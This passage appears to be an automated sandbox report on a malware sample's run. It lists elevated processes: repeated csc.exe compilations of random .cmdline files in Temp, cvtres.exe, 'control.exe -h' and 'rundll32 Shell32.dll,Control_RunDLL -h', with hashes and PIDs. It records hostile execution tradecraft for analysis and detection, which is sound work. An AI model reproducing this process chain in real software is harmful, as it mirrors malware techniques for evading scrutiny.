                        MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET

                        Analysis Process: cvtres.exe PID: 3620 Parent PID: 6552

                        General

                        Start time:10:34:32
                        Start date:14/12/2021
                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES451.tmp" "c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP"
                        Imagebase:0x7ff62ec30000
                        File size:47280 bytes
                        MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Analysis Process: csc.exe PID: 6188 Parent PID: 7160

                        General

                        Start time:10:34:32
                        Start date:14/12/2021
                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
                        Imagebase:0x7ff768110000
                        File size:2739304 bytes
                        MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET

                        Analysis Process: csc.exe PID: 5760 Parent PID: 7132

                        General

                        Start time:10:34:32
                        Start date:14/12/2021
                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
                        Imagebase:0x7ff768110000
                        File size:2739304 bytes
                        MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET

                        Analysis Process: control.exe PID: 4904 Parent PID: 6400

                        General

                        Start time:10:34:33
                        Start date:14/12/2021
                        Path:C:\Windows\System32\control.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\control.exe -h
                        Imagebase:0x7ff65b0e0000
                        File size:117760 bytes
                        MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Analysis Process: csc.exe PID: 6248 Parent PID: 3532

                        General

                        Start time:10:34:35
                        Start date:14/12/2021
                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
                        Imagebase:0x7ff768110000
                        File size:2739304 bytes
                        MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET

                        Analysis Process: cvtres.exe PID: 6796 Parent PID: 6188

                        General

                        Start time:10:34:35
                        Start date:14/12/2021
                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BF.tmp" "c:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP"
                        Imagebase:0x7ff62ec30000
                        File size:47280 bytes
                        MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Analysis Process: cvtres.exe PID: 6152 Parent PID: 5760

                        General

                        Start time:10:34:36
                        Start date:14/12/2021
                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES148E.tmp" "c:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP"
                        Imagebase:0x7ff62ec30000
                        File size:47280 bytes
                        MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Analysis Process: csc.exe PID: 3520 Parent PID: 7012

                        General

                        Start time:10:34:37
                        Start date:14/12/2021
                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
                        Imagebase:0x7ff768110000
                        File size:2739304 bytes
                        MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET

                        Analysis Process: control.exe PID: 6580 Parent PID: 6424

                        General

                        Start time:10:34:37
                        Start date:14/12/2021
                        Path:C:\Windows\System32\control.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\control.exe -h
                        Imagebase:0x7ff65b0e0000
                        File size:117760 bytes
                        MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Analysis Process: control.exe PID: 4912 Parent PID: 6388

                        General

                        Start time:10:34:37
                        Start date:14/12/2021
                        Path:C:\Windows\System32\control.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\control.exe -h
                        Imagebase:0x7ff65b0e0000
                        File size:117760 bytes
                        MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Analysis Process: cvtres.exe PID: 6540 Parent PID: 6248

                        General

                        Start time:10:34:38
                        Start date:14/12/2021
                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B16.tmp" "c:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP"
                        Imagebase:0x7ff62ec30000
                        File size:47280 bytes
                        MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Analysis Process: rundll32.exe PID: 3492 Parent PID: 4904

                        General

                        Start time:10:34:39
                        Start date:14/12/2021
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                        Imagebase:0x7ff6d6300000
                        File size:69632 bytes
                        MD5 hash:73C519F050C20580F8A62C849D49215A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Disassembly

                        Code Analysis

                        Reset < >